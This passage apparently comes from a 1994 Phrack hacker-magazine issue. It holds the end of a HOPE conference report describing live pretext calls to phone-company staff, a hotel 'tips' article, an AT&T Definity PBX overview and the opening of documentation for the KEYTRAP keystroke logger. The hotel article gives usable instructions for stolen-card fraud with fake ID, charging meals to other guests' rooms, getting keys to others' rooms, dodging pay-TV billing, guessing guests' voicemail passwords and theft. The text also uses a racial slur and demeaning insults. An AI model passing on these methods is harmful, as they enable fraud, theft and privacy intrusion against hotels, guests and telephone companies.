understand that this is not the sort of feature that the phone
company wants to have in the hands of a generation of kids who
are so apathetic that they don't even know they don't give a
shit. Nonetheless, the access to this capability is through an
800 number and a PIN.
Supernigger was going to show us how to acquire such privileged
information. Live. "When you get some phone company person as
dumb as a bolt on the other end, and you know a few buzz words.
you convince them that it is in their best interest and that they
are supposed to give you the information."
"I've never done this in front of an audience before, so give me
three tries," he explained to an anxiously foaming at the mouth
crowd. No one took a cheap pot shot at him: tacit acceptance of
his rules.
Ring. Ring.
"Operations. Mary."
"Mary. Hi, this is Don Brewer in social engineering over at CIS,
how's it going?" Defuse.
"Oh, fine. I guess."
"I know, I hate working Sundays. Been busy?"
"Nah, no more. Pretty calm. How can I help you?"
"I'm doing a verification and I got systems down. I just need
the C/NA. You got it handy?" Long pause.
"Sure, lemme look. Ah, it's 313.424.0900." 700 notebooks ap
peared out of nowhere, accompanied by the sound of 700 pens
writing down a now-public phone number.
"Got it. Thanks." The audience is gasping at the stunningly
stupid gullibility of Mary. But quiet was essential to the
mission.
"Here's the PIN number while we're at it." Double gasp. She's
offering the supposedly super secret and secure PIN number? Was
this event legal? Had Supernigger gone over the line?
"No, CIS just came up. Thanks anyway."
"Sure you don't need it?"
"Yeah. Thanks. Bye." Click. No need to press the issue. PIN
access might be worth a close look from the next computer DA
wanna-be.
An instant shock wave of cacophonous approval worked its way
throughout the 750 seat ballroom in less than 2 microseconds.
Supernigger had just successfully set himself as a publicly
ordained Cyber Christ of Social Engineering. His white robes
were on the way. Almost a standing ovation lasted for the better
part of a minute by everyone but the narcs in the audience. I
don't know if they were telco or Feds of whatever, but I do know
that they were the stupidest narcs in the city of New York. This
pair of dour thirty something Republicans had sphincters so tight
you could mine diamonds out of their ass.
Arms defiantly and defensively crossed, they were stupid enough
to sit in the third row center aisle. They never cracked a smile
at some of the most entertaining performances I have seen outside
of the giant sucking sound that emanates from Ross Perot's ears.
Agree or disagree with hacking and phreaking, this was funny and
unrehearsed ad lib material. Fools. So, for fun, I crawled over
the legs of the front row and sat in the aisle, a bare eight feet
from the narcs. Camera in hand I extended the 3000mm tele-photo
lens which can distinguish the color of a mosquitoes underwear
from a kilometer and pointed it in their exact direction. Their
childhood acne scars appeared the depth of the Marianna Trench.
Click, and the flash went off into their eyes, which at such a
short distance should have caused instant blindness. But noth
ing. No reaction. Nada. Cold as ice. Rather disappointing, but
now we know that almost human looking narc-bots have been per
fected and are being beta tested at hacker cons.
Emmanuel Goldstein is very funny. Maybe that's why Ed Markey and
he get along so well. His low key voice rings of a gentler,
kinder sarcasm but has a youthful charm despite that he is 30-
something himself.
"Sometimes you have to call back. Sometimes you have to call
over and over to get what you want. You have to keep in mind
that the people at the other end of the phone are generally not
as intelligent as a powered down computer." He proceeded to
prove the point.
Ring ring,
"Directory Assistance."
"Hi."
"Hi."
"Hi."
"Can I help you."
"Yes."
Pause.
"Hello?"
"Hi."
"Hi."
"Can I help you.:
"OK."
Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words.
"Directory Assistance."
"I need some information."
"How can I help you."
"Is this where I get numbers?"
"What number would you like?"
"Information."
"This is information."
"You said directory assistance."
"This is."
"But I need information."
"What information do you need?"
"For information."
"This is information."
"What's the number?"
"For what?"
"Information."
"This is directory assistance."
"I need the number for information."
Pause. Pause.
"What number do you want?"
"For information."
Pause. Guffaws, some stifled, some less so. Funny stuff.
"Hold on please."
Pause.
"Supervisor. May I help you?"
"Hi."
"Hi."
Pause.
"Can I help you?"
"I need the number for information."
"This is directory assistance."
"Hi."
"Hi."
"What's the number for information?"
"This is information."
"What about directory assistance?"
"This is directory assistance."
"But I need information."
"This is information."
"Oh, OK. What's the number for information?"
Pause.
"Ah 411."
"That's it?"
"No. 555.1212 works too."
"So there's two numbers for information?"
"Yes."
"Which one is better?" How this audience kept its cool was
beyond me. Me and my compatriots were beside ourselves.
Pause.
"Neither."
"Then why are there two?"
Pause.
"I don't know."
"OK. So I can use 411 or 555.1212."
"That's right."
"And which one should I use?"
Pause.
"411 is faster." Huge guffaws. Ssshhhh. Ssshhhh..
"Oh. What about the ones?"
"Ones?"
"The ones."
"Which ones?"
"The ones at the front of the number."
"Oh, those ones. You don't need ones. Just 411 or 555.1212.."
"My friends say they get to use ones." Big laugh. Shhhhhh.
"That's only for long distance."
"To where?" How does he keep a straight face?
Pause.
"If you wanted 914 information you'd use a one."
"If I wanted to go where?"
"To 914?"
"Where's that?"
"Westchester."
"Oh, Westchester. I have friends there."
Pause.
"Hello?"
"Yes?"
"So I use ones?"
"Yes. A one for the 914 area."
"How?"
Pause.
"Put a one before the number."
"Like 1914. Right?"
"1914.555.1212."
"All of those numbers?"
"Yes."
"That's three ones."
"That's the area code."
"I've heard about those. They confuse me." Rumbling chuckles
and laughs throughout the hall.
Pause.
She slowly and carefully explained what an area code is to the
howlingly irreverent amusement of the entire crowd except for the
fool narcs.
"Thanks. So I can call information and get a number?"
"That's right."
"And there's two numbers I can use?"
"Yes."
"So I got two numbers on one call?"
"Yeah . . ."
"Wow. Thanks. Have a nice day."
* * * * *
Comments heard around HOPE.
Rop Gongrijjp, Hacktic: "The local phone companies use their own
social engineers when they can't get their own people to tell
them what they need to know."
Sprint is using what they consider to be the greatest access
mechanism since the guillotine. For all of us road warriors out
there who are forever needing long distance voice service from
the Whattownisthis, USA airport, Sprint thinks they have a better
mousetrap. No more messing finger entry. No more pass-codes or
PIN's.
I remember at the Washington National Airport last summer I was
using my Cable and Wireless long distance access card and entered
the PIN and to my surprise, an automated voice came on and said,
"Sorry, you entered your PIN with the wrong finger. Please try
again."
Sprint says they've solved this thorny cumbersome problem with a
service called "The Voice Fone Card". Instead of memorizing
another 64 digit long PIN, you just speak into the phone: "Hi,
it's me. Give me dial tone or give me death." The voice recog
nition circuits masturbate for a while to determine if it's
really you or not.
Good idea. But according to Strat, not a good execution. Strat
found that someone performing a poor imitation of his voice was
enough to break through the front door with ease. Even a poor
tape recording played back over a cheap cassette speaker was
sufficient to get through Sprint's new whiz-banger ID system.
Strat laughed that Sprint officials said in defense, "We didn't
say it was secure: just convenient."
Smart. Oh, so smart.
* * * * *
"If my generation of the late 60's and early 70's had had the
same technology you guys have there never would have been an
80's." This was how I opened my portion of the author's panel.
The authors panel was meant to give HOPE hackers insight into how
they are perceived from the so-called outside. I think the
session achieved that well, and I understand the videos will be
available soon.
The question of electronic transvestites on AOL came up to every
one's enjoyment, and all of us on the panel retorted with a big,
"So what?" If you have cyber-sex with someone on the 'Net and
enjoy it, what the hell's the difference? Uncomfortable butt
shifting on chairs echoed how the largely male audience likely
feels about male-male sex regardless of distance.
"Imagine," I kinda said, "that is a few years you have a body
suit which not only can duplicate your moves exactly, but can
touch you in surprisingly private ways when your suit is connect
ed to another. In this VR world, you select the gorgeous woman
of choice to virtually occupy the other suit, and then the two of
you go for it. How do you react when you discover that like
Lola, 'I know what I am, and what I am is a man and so's Lola.'"
Muted acknowledgment that unisex may come to mean something
entirely different in the not too distant future.
"Ooh, ooh, please call on me." I don't mean to be insulting, but
purely for identification purposes, the woman behind the voice
bordered on five foot four and four hundred pounds. Her bathtub
had stretch marks.
I never called on her but that didn't stop her.
"I want to know what you think of how the democratization of the
internet is affected by the differences between the government
and the people who think that freedom of the net is the most
important thing and that government is fucked but for freedom to
be free you have to have the democracy behind you which means
that the people and the government need to, I mean, you know, and
get along but the sub culture of the hackers doesn't help the
government but hackers are doing their thing which means that the
democracy will not work , now I know that people are laughing and
giggling (which they were in waves) but I'm serious about this
and I know that I have a bad case of hypomania but the medication
is working so it's not a bad as it could be. What do you think?"
I leaned forward into the microphone and gave the only possible
answer. "I dunno. Next." The thunderous round of applause
which followed my in-depth response certainly suggested that my
answer was correct. Not politically, not technically, but anar
chistically. Flexibility counts.
* * * * *
HOPE was attended by around one thousands folks, and the Hotel
Filthadelphia still stands. (Aw shucks.)
My single biggest complaint was not that the schedules slipped by
an hour or two or three; sessions at conferences like this keep
going if the audience is into them and they are found to be
educational and productive. So an hour session can run into two
if the material and presentations fit the mood. In theory a
boring session could find itself kama kazi'd into early melt-down
if you have the monotone bean counter from hell explaining the
distributed statistical means of aggregate synthetic transverse
digitization in composite analogous integral fruminations.
(Yeah, this audience would buy off on that in a hot minute.) But
there were not any bad sessions. The single track plenary style
attracted hundred of hackers for every event. Emmanuel and
friends picked their panels and speakers well. When dealing with
sponge-like minds who want to soak up all they can learn, even in
somewhat of a party atmosphere, the response is bound to be good.
My single biggest complaint was the registration nightmare. I'd
rather go the DMV and stand in line there than get tagged by the
seemingly infinite lines at HOPE. At DefCon early registration
was encouraged and the sign up verification kept simple.
For some reason I cannot thoroughly (or even partially) fathom, a
two step procedure was chosen. Upon entering, and before the
door narcs would let anyone in, each attendee had to be assigned
a piece of red cardboard with a number on it. For the first day
you could enter the 'exhibits' and auditorium without challenge.
But by Day 2 one was expected to wait in line for the better part
of a week, have a digital picture taken on a computer tied to a
CCD camera, and then receive a legitimate HOPE photo-ID card.
What a mess. I don't have to beat them up on it too bad; they
know the whole scheme was rotten to the core.
I waited till near the end of Day 2 when the lines were gone and
the show was over. That's when I got my Photo ID card. I used
the MIB's photo ID card the rest of the time.
HOPE was a lot of fun and I was sorry to see it end, but as all
experiences, there is a certain amount of letdown. After a great
vacation, or summer camp, or a cruise, or maybe even after Wood
stock, a tear welts up. Now I didn't cry that HOPE was over, but
an intense 48 hours with hackers is definitely not your average
computer security convention that only rolls from 9AM to Happy
Hour. At a hacker conference, you snooze, you lose. You never
know what is going to happen next - so much is spontaneous and
unplanned - and it generally is highly educational, informative
and entertaining.
Computer security folks: you missed an event worth attending.
You missed some very funny entertainment. You missed some fine
young people dressed in some fine garb. You missed the chance to
meet with your perceived 'enemy'. You missed the opportunity to
get inside the heads of the generation that knows more about
keyboards than Huck Finning in suburbia. You really missed
something, and you should join Robert MIB Steele and I at the
next hacker conference.
* * * * *
If only I had known.
If only I had known that tornadoes had been dancing up and down
5th avenue I would have stayed at the Hotel Filthadelphia for
another night.
La Guardia airport was closed. Flights were up to 6 hours de
layed if not out and out canceled. Thousands of stranded travel
ers hunkered down for the night. If only I had known.
Wait, wait. Hours to wait. And then, finally, a plane ready and
willing to take off and swerve and dive between thunderbolts and
twisters and set me on my way home.
My kids were bouncing out of the car windows when my wife picked
me up at the airport somewhere in the vicinity of 1AM.
"Not too late are you dear?" Sweet Southern Sarcasm from my
Sweet Southern Wife.
"Don't blame me," I said in all seriousness. "It was the hack
ers. They caused the whole thing."
* * * * *
Notice: This article is free, and the author encourages responsi
ble widespread electronic distribution of the document in full,
not piecemeal. No fees may be charged for its use. For hard
copy print rights, please contact the author and I'll make you an
offer you can't refuse. The author retains full copyrights to
the contents and the term Cyber-Christ.
Winn is the author of "Terminal Compromise", a novel detailing
a fictionalized account of a computer war waged on the United
States. After selling well as a book-store-book, Terminal Com
promise was placed on the Global Network as the world's first
Novel-on-the-Net Shareware and has become an underground classic.
(Gopher TERMCOMP.ZIP)
His new non-fiction book, "Information Warfare: Chaos on the
Electronic Superhighway" is a compelling, non-technical analy
sis of personal privacy, economic and industrial espionage and
national security. He calls for the creation of a National
Information Policy, a Constitution in Cyberspace and an Elec
tronic Bill of Rights.
He may be reached at INTER.PACT, 11511 Pine St., Seminole,
FL. 34642. 813-393-6600, fax 813-393-6361, E-Mail:
P00506@psilink.com.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 24 of 28
****************************************************************************
The ABCs of better H O T E L Staying ...
... by SevenUp (sec@escape.com)
This ARTICLE will give you some information on how to experience
a cheaper, safer, and more comfortable stay at your next hotel visit.
Always keep in mind that the staff is taught to make your stay
as pleasant as possible and fulfil most of your wishes. So it is often
a matter of social engineering to reach your goal.
BUSINESS CENTRES
Many good hotels offer business centres. Some business centres just offer
"typing service" at high rates, others provide a PC you can use for free.
Usually it is a 286 or older, but it should give you the opportunity
to copy warez, write your latest article for Phrack or even connect your
pocket modem and login to the -> Internet.
CREDIT CARDS
If you have your own card and don't mind paying for the room - great!
Just use it when you check in - most places require you to have a credit
card or won't let you use the phone or won't even let you in.
You want to use someone else's card? Be careful! Don't use a stolen
card when you check in, or you won't have a safe sleep, fearing that they
could come and get you. You would be safer if you tell them upon check in
that you misplaces your card and don't need to make long distance calls,
and just want to pay with it in the end. This doesn't work always, but
sometimes. You also need a faked ID upon check in with the same name as
the cardholder.
But overall, using a faked Credit Card in a hotel is one of the easiest ways
to get busted.
DIALUPS
Many hotels have dialins for their reservation system. Novells are quite
popular. Some hotels also use PC based UNIXes (old System V's mostly)
that are often unprotected - no passwords on the root account or even
giving you a shell prompt when you call the dialup. Most of them are 7e1
at slow speeds. I won't say more about reservation systems here.
EATING & DANCING
Many hotels have good and relatively expensive restaurants and discos.
They just require you to sign the check with a room number and full name.
If you know of a guest that is checked in and has secured his account with
a credit card who just checked in, just use his name and room number -
this is probably the biggest lack of security in a hotel.
Also if you don't stay at the hotel but want to go to their disco at night,
pretend to be a guest to get in free and save cover charges. They usually
believe you.
FUCKING
You've read right, hotels are favorite places to make love. No matter
if you bring your IRC date here, pick up a hooker or stay alone and
watch the in-house porn movies. Since many hotels pride themselves in
having as much staff as guests, the question is how to get the cute
waitresses and maids into your bed. If anyone has experience making
them willing without much financial and physical effort, drop me a
mail and I will include it in the next list.
GET ALL
Some people love to take all movable parts from the room before checking
out. The question is what to take and what not.
The easiest things to take are soaps, shampoo, lotions and Kleenex from
the bathroom, since they will be replaced every morning without problems.
If you want a bathrobe (usually most expensive item), hide it in your
suitcase immediately after check in and then complain that there was just
one robe in your room. They will bring you a new one immediately. If you
take one when you leave the hotel, they will notice and most likely
charge you $100 in your credit card. If you want a bath towel, also don't
wait until the end of your stay, but hide it some days earlier. If anyone
should ask about it, just tell him that you left it at the pool.
Taking magazines from your room is usually no problem, but stay away
from removing the TV or blankets!
HYATT GOLD PASSPORT
If you want to check in at a Hyatt, get yourself their Gold Pass before.
It is free of charge and will get you free Orange Juice, Coffee and a
newspaper in the morning, and also a bigger room.
INTERNET
So you are at a hotel in a new city and want to get on the Internet?
There are usually 2 ways: Using a computer and a modem from your hotel room
and calling a dialup, or walking to a local university and logging in from
there.
If you bring your laptop with built-in modem, find the dialup in the
Internet Dialup list in this issue of Phrack, get an account on the host
and can make free local calls from your room, the first choice is probably
the best one.
But if you don't have your own account at a local school and want to
stay legit, it is often useful to walk to a computer lab in that school
and check out their computers. Many school around the world have PC's
in their labs which let you do a telnet throughout the world without
needing any account or password, or ID to enter the school. You can find
them in Hong Kong, New York, Munich and many other major cities; but usually
they are unknown to the public or are likely to be closed down (similar to the
vending machines, see -> SEVENUP).
JACKING OFF
See -> Fucking.
KEY
There are plenty of different types of room keys. Some hotels still use
old-fashioned standard keys, but most use programmable keys (plastic cards
with "holes" or magnetic stripes, or even the pretty modern metal keys
in key-shape, which allow programming of their magnetic fields. These
programmable keys will always be reprogrammed if a guest checks out.
On the other hand, if you go to the reception and claim that you lost
your key, they will always program a spare key for you. Sometimes they
ask you for your birthday, sometimes for your ID (just tell them you
left it in your room). This way you could easily get into someone else's
room.
LIGHT
Some hotels have quite fancy light systems. If the light won't shine,
there is often a box in the entrance where you have to enter your key
(or some paper) to activate the main power. This should help saving
energy while you are gone, but sometimes even the air condition will
turn off, so you have to fool the box with a paper or spare key.
Some systems will turn on certain lights just when you insert the key
into the door and open it. This is quite unfortunate if your roommate
sleeps while you go cruising and clubbing at night. When you return,
the light will shine bright and wake him up. The only thing that helps
is unscrewing the light bulbs.
MOVIES & TV
I bet many of you will first turn on the TV after entering the room.
Some people just stay at hotels that offer HBO in their rooms.
Before playing with the remote, read the papers above the TV carefully,
because some channels might show in-house movies that are being charged
automatically without any warning. Typical rates are US $6-9 per movie.
Of course you don't want to pay that much, nor do I.
Here are the 3 big S' of movie watching:
Spectravision, Sex movies and Social Engineering.
Spectravision is one of the most popular systems. It usually allows you
to watch 5 minutes (sometimes 2) of each movie per day free, enough for
some people to come. There are usually a bunch of BNC cables from the
wall to your Spectravision box and to your TV. One of the cables delivers
the program, the other assures billing. Use your fantasy and try replacing
the "billing cable" in the wall! Generally it can also be useful to use
a standard cable decoder (cablebox) to decode the pay channels. Just bring
one along and if you are lucky, you can watch the movies easily.
If all your technical expertise fails, there is still one way of watching
movies for free: Social Engineering. Just watch the movies of your choice
and then complain to the reception that you had trouble with the TV,
that the Spectravision box or remote control broke, or that you caught
the maid watching movies in your room. If you cry a lot, they will usually
be nice and remove the movies from your bill.
PHONE CALLS
Be careful before making any phone calls from your room. Many hotels
charge you up to $3 for 800 numbers and log all your touch tones (and
calling codez!). You can't be sure who will view the logs and abuse your
calling card. Also there are often high surcharges for long distance calls,
up to 40% on top of AT&T's operator connected charges. There are also hotels
that charge a minimum charge per call (up to $5), even if you just talked
for 10 seconds long distance. On the other side, some hotels offer free local
and 800 calls. Just make sure and read all papers in the room and contact
the reception. I also had operators telling me lower rates than the ones that
showed up on my bill, so be careful.
RACK RATE
This is the highest possible rate for a room, and the rate that is officially
displayed at the reception. You should never pay that rate. If you say you
are with a company they will give you a discount of at least 10% (corporate
rate). Some hotels even give qualified people and companies discounts of
25% - 50% on the rack rate. When you wonder if you pay too much for your
room or think you got a great rate, send me a mail, because I try to keep
a database about cheapest prices for selected hotels.
SEVENUP, Coke, Pepsi & Rootbeer:
You are staying at a five-star hotel. You are thirsty. Your room has
a minibar, but the cheapest soda is $4.95. The next supermarket or gas
station is 20 miles away. But you need a Coke. What to do now?
TRY finding the gangways where the employers work, live and eat!
About every bigger hotel has a kitchen for employees. They also have
a vending machine hidden somewhere, with sodas for just 60 cents.
When strolling through the restricted area, just walk straight, slowly
and self confident. If someone asks you what you are doing, tell them:
a) you are an undercover agent for the IRS and they should get lost.
b) you are looking for the vending machine. (telling the truth openly
with a broad smile can be more successful than you think!)
c) you are a new employee and ask her to show you around
Also notice the signs and posters in most restricted areas, telling
the personnel to be "enthusiastic, punctual, generous to the guest..."
Quote these phrases when an employer behaves nasty towards you.
UPGRADES
After first going into your room and checking it out, go back to
the reception and complain that the bed is too small, the street noise
is too loud, the view is too poor, etc. Quite often they will give you
a nicer and bigger room on their executive floor! See also -> Hyatt
Gold Passport.
VOICE MAIL
Many good hotels offer voice mail to their guests. The most popular
system is Meridian Mail. Some hotels have an own dialup for the voicemail,
but mostly the hotel just lets you access it through the main PBX operator.
If you are unlucky you have to wait 5 rings at a number before the
Voice Mail answers.
Most guests don't use Voice Mail. The few that do also keep the default
password, which is often the room number or the birthday of the guest.
One way to get the birthday is call up front desk, tell them you are
with "Mommy's Birthday Cakes Delivery" and have a cake for John Smith.
Ask them to check birthday's of all John Smith's etc. Of course there
are more ways, just use your social engineering fantasy!
WHERE TO GO?
It is pretty hard to recommend chains in general. But I had quite
good experience with Hilton, Hyatt (try getting a room on the Regency
floor), Holiday Inn (sometimes really cheap prices and good standard),
Shangri-La (best hotels in Asia) and Marriott (usually nice service).
I had less good experience with Sheraton (less discounts), Peninsula,
Regent & Four Seasons (all a bit overpriced and not so modern). But
there are always exceptions, so tell me about your experience!
I hope some of these tips might be useful for you. Stay tuned and wait
for a new issue of travel tips, next time about Airlines!
(c)opyright 1994 by the author. Publication outside of Phrack forbidden.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 25 of 28
****************************************************************************
================================
AT&T Definity System 75/85
Communications System
Description & Configuration
================================
Written By: erudite
(armitage@dhp.com)
=====
Intro
=====
Let me introduce you to the AT&T Definity System 75/85. This communications
system is a product of the merging of the AT&T System 75 and System 85
architectures. The name Definity came from the two words "definitive" and
"infinity".
Let me also tell you that there are many different communications systems
out there. (Merlins, AT&Ts) Many many many, I couldn't name them all, but
the AT&T systems are nice. I enjoy working with them, and I hope you enjoy
this text file.
This System is an advanced business communications system. A Digital
Communications Protocol (DCP) allows data communication through data
terminal equipment connected to the digital switch. This allows the
system to handle data and voice communications simultaneously.
The System can handle up to 1600 lines that supports all digital, hybrid,
and analog terminals and equipment. Up to 400 trunks, and up to 400
Automatic Call Distribution (ACD) Agents. The Data switching capacity is up
to 800 digital data endpoints, and 160 integrated and combined pooled modem
facilities.
~ 510D Personal Terminal or 515-Type Business Communications Terminal
~ 7404D Terminals
~ 7406D or 7407D Equipped with optional Data Module Base
~ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
~ Digital Terminal Data Modules
~ 3270 Data Modules
~ Internal Data Channels
~ Trunk Data Modules (Modular)
~ Processor Data Modules (Modular)
==========
Networking
==========
The Processor Port Network (PPN) always provides the switch processing
element (SPE) and port circuits. An Expansion Port Network (EPN) is
available to increase line size of any system by allowing you to add
additional port circuits. The EPN connects to the PPN over a fiber
optic cable that may be up to 1.86 miles remotely situated. It may also
by located adjacent to the PPN.
This System may be arranged stand-alone or you can integrate it into a
private network. You can form these types of Networks:
~ Tandem Tie Trunk Network (TTTN)
~ Electronic Tandem Network (ETN)
~ Main/Satellite Configuration
~ Distributed Communications System (DCS)
~ Centralized Attendant Service (CAS)
An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
makes it possible for the Definity System to access various private and
public network services. With ISDN-PRI the you can access these services:
~ Call by Call Service Selection
~ Private Network Services
~ Information Forwarding
~ Call Identification Display
- Connected Number Display
- Connected Party Name Display
- Calling and Called Number Record Display
- Calling and Called Party Name Display
=============
Configuration
=============
The Actual System is encased in a pair of "cabinets" which have a fiber
optic link between them. It is also common to have a stack of about three
"cabinets" of a smaller size, for different models.
Shown here is a typical multi-carrier system with a Processor Port Network
(PPN) cabinet and Expansion Port Network (EPN) cabinet.
attendant outside trunks _____ outside private line
consoles and lines / data transmission equipment or
\ \ / analog switched network
\ fiber optic | |
| connection | | __ business communication
-+---------/~\--------+--+ / terminals
| AT&T | | AT&T | |
| DEFINITY | | DEFINITY +------' ___data
---+ SYSTEM | | SYSTEM +--------<>------[audix] / terminals
/ | 75/85 | | 75/85 | modular data /
| |___________| |__________+| processor ____ |
manager | | | | +'optional host
terminal | | +-------<>----------+ | computer or call
/ +-------[]-----+, |____| management system
/ asynchronous |
single line data unit \__ data
voice terminals terminals
===================
Voice and Data
Management Features
===================
There are a lot of voice features and services, in fact, too many to list, I
will do a run down on all the interesting and useful features and services.
It has many Voice Management, Data Management, Network Services, System
Management, Hospitality Services, and Call Management Services.
call attendant can use to operate the console more efficiently
both inside system users and remote callers to edit, receive, send,
write, and forward voice messages.
system.
it to the display console.
- Attendant Conference: Allows Attendant to construct a conference call
- Terminal Conference: Allows remote user to construct a conference call
without attendant assistance.
being interrupted by any of the systems overriding features, and denies
ability to gain access to, and or superimpose tones.
is issued by the administrator to a certain extension # for indication of
a dedicated private data extension.
the system to dial anyone else, such as the attendant console.
the following trunks and more.
~ Voice Grade DS1 Tie Trunks
~ Alternative Voice/Data (AVD) DS1 Tie Trunks
~ Digital Multiplexed Interface (DMI) Tie Trunks
~ Central Office (CO) Trunks
~ ISDN-PRI Trunks
~ Remote Access Trunks
~ Wide Area Telecommunications Service (WATS) Trunks
features and functions that is used for maintenance testing. Such as access
to system tones, access to specific trunks, etc.
Note: AT&T designed the Facility Test Calls Feature for testing
purposes only, and system maintenance. When properly
administered, AT&T claims that the customer is responsible for
all security items, and secure system from unauthorized users,
and that all users should be aware of handling access codes.
AT&T claims they will take no responsibility for poor
administration.
it rings down if busy, or if it receives a dial timeout.
packet switched local area network that will link with mainframes,
workstations, personal computers, printers, terminals, storage devices,
and communication devices.
This interface allows connection of the system to an ISDN Network by means
of ISDN frame format called PRI.
branch has a Listed Directory Number (LDN).
~ Common Control Switching Arrangement (CCSA)
~ Electronic Tandem Network (ETN)
~ Enhanced Private Switched Communications Service (EPSCS)
~ Tandem Tie Trunk Network (TTTN)
~ Software Defined Network (SDN)
doesn't want to take responsibility for anything that is abused with this
feature.
would come in handy.
others calls, again, AT&T does not want to take any legal fees on misuse
on this feature.
attendant's assistance.
========
Software
========
The System comes with switched services software, administrative software,
and maintenance software. All running on a real-time operating system.
and services. This also is responsible for relaying any information to the
console display.
tasks, and configurations.
keep everything running properly.
=====================
System Administration
=====================
The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
number. The pound (#) and star (*) keys can be used as the first digit of the
code. Below you will see a typical Screen Format taken from one of my logs,
information aside you can see and get a feel of what the administration side of
the system is like. Page 1 of 4
STATION
Extension: ____
Type: _____ Lock Messages: _ COR: _ Room: _____
Port: ___________ Security Code: ____ COS: _ Jack: _____
Name: ___________ Coverage Path: ___ Cable: _____
FEATURE OPTIONS
LWC Reception? _____ Headset? _ Coverage Msg Retrieval? _
LWC Activation? _ Auto Answer? _ Data Restriction? _
Redirect Notification? _ Idle Appearance Preferences? _
PCOL/TEG Call Alerting? _
Data Module? _ Restrict Last Appearance? _
Display? _
ABBREVIATED DIALINGS
List1: _____ List2: _____ List3: _____
BUTTON ASSIGNMENTS
1: _______ 6: _______
2: _______ 7: _______
3: _______ 8: _______
4: _______ 9: _______
5: _______
==================
System Maintenance
==================
Finally the Maintenance section, where you can see where the errors are
logged, where all the alarms are sent, printed, etc.
There are 3 different types of alarms:
console or INADS)
The Error log is reported and can be viewed at The Manager Terminal,
as well as the alarm log.
==============
Basic Acronyms
==============
ADU Asynchronous Data Unit
AUDIX Audio Information Exchange
COR Class of Restriction
COS Class of Service
DCP Digital Communications Protocol
DMI Digital Multiplexed Interface
EPN Expansion Port Network
ISDN Integrated Service Digital Network
PPN Processor Post Network
PSDN Packet Switching Data Network
=====
Tones
=====
Here is most of the Tones, mostly either interesting ones or often used
tones the System. Here are the tones, the frequencies, and the moderations.
Tone Frequency Pattern
---- --------- -------
Answer Back 3 2225 Hz 3000 on
Answer Back 5 2225 Hz 5000 on
Bridging Warning 440 Hz 1750 on, 12000 off,
650 on; repeated
Busy 480 Hz + 620 Hz 500 on, 500 off; repeated
Call Waiting
Internal 440 Hz 200 on
External 440 Hz 200 on, 200 off
Attendant 440 Hz 200 on, 200 off
Priority Call 440 Hz 200 on, 200 off, 200 on,
200 off, 200 on
Call Waiting
Ring Back 440 Hz + 480 Hz; 900 on (440 + 480)
440 Hz 200 on (440) 2900 off; repeated
Cnrt Att Call
Incoming Call
Identification 480 Hz & 440 Hz 100 on (480), 100 on (440),
& 480 Hz 100 on silence;
Dial Zero,
Attendant Transfer,
Test Calls, 440 Hz 100 on, 100 off, 100 on
Coverage 440 Hz 600 on
Confirmation 350 Hz + 400 Hz 100 on, 100 off, 100 on,
100 off, 100 on
Dial 250 Hz + 400 Hz Continuous
Executive Override 440 Hz 300 on followed by
Intercept 440 Hz & 620 Hz 250 on (440),
250 on (620); repeated
Ringback 440 Hz + 480 Hz 1000 on, 3000 off; repeated
Zip 480 500 on
=====
Outro
=====
System 75/85 (multi-carrier cabinet model) communications system.
I hope you learned something, anywayz, questions comments, system login
information, defaults, where to get manuals, or anything else:
email me (armitage@dhp.com) and I will get back to you.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi4sHnsAAAEEALjw8E+bOEr1BlCyrBp8f3Ko8yOX5P5uiP+Vor5SamJ33gbu
PBSBOc+Xww+93Pjl/R7gMC/c/FFtn+ehHsCm5u3AaIXSmx2ZVW2Xen9vXBRMZRB+
rpC2GdCiFCAdfaHwANHaeuHDmKiP4GqaQuG1M1Xzv9NqW4m70tndGYkB59slAAUT
tAdFcnVkaXRl
=Nx+g
-----END PGP PUBLIC KEY BLOCK-----
erudite (armitage@dhp.com) (armitage on irc) ==Phrack Magazine==
Volume Five, Issue Forty-Six, File 26 of 28
****************************************************************************
KEYTRAP v1.0 - Keyboard Key Logger
by Dcypher (Dcypher@aol.com)
-------------------------------------------------------------------------
THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR
FOREIGN LAW. THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS
TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW !
-------------------------------------------------------------------------
You may distributed UNMODIFIED copies of KEYTRAP freely, subject to the
above limitations, and provided all files are included in unmodified
form; KEYTRAP.EXE, KEYTRAP.DOC
-------------------------------------------------------------------------
The author disclaims ALL warranties relating to the program, whether
express or implied. In absolutely no event shall the author be liable
for any damage resulting from the use and/or misuse of this program.
-------------------------------------------------------------------------
WHAT IS KEYTRAP ?
~~~~~~~~~~~~~~~~~
KEYTRAP is a very effective keyboard key logger that will log
keyboard scancodes to a logfile for later conversion to ASCII
characters. Keytrap installs as a TSR, remaining in memory
until the computer is turned off.
CONVERT will convert the keyboard scancodes captured by Keytrap
to their respective keyboard (ASCII) characters.
Usage: KEYTRAP <dir\logfile> /A /B /C
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A - Maximum size of logfile
B - Number of keys to log per session
C - Number of minutes between each session
Keytrap is a command line program.
<dir\logfile> - You MUST specify a directory for the logfile.
If you don't specify a directory Keytrap will only look in the
current directory for the logfile. If the logfile is not found
in the current directory no writing will occur. Keytrap will
append the scancode data to the end of the file you specify.
A - The Maximum size of the logfile. This number is checked only
when Keytrap is installed. If the size of the logfile exceeds this
number, Keytrap will delete the logfile and create a new one.
B - This is the number of keys to log per session. Keytrap will
only check this number AFTER a write to the logfile. So if you
specify 50 keys, and Keytrap does not get a chance to write till
there are 100 keys in the buffer, then Keytrap will log 100 keys.
C - This is the number of minutes between each session. When Keytrap
reaches or exceeds the number of keys to log per session, it will
start a delay routine and check this number. You can't specify more
then 1440 minutes, the number of minutes in a day !
Example: KEYTRAP c:\logfile /20000 /200 /20
Keytrap will check "logfile" to see if it exceeds 20,000
bytes. If it does, Keytrap will delete the log file and then
create a new one. Keytrap will then install as a TSR program.
It will log approx 200 keys at a time with a delay of 20 minutes
between each session.
Usage: CONVERT logfile outfile
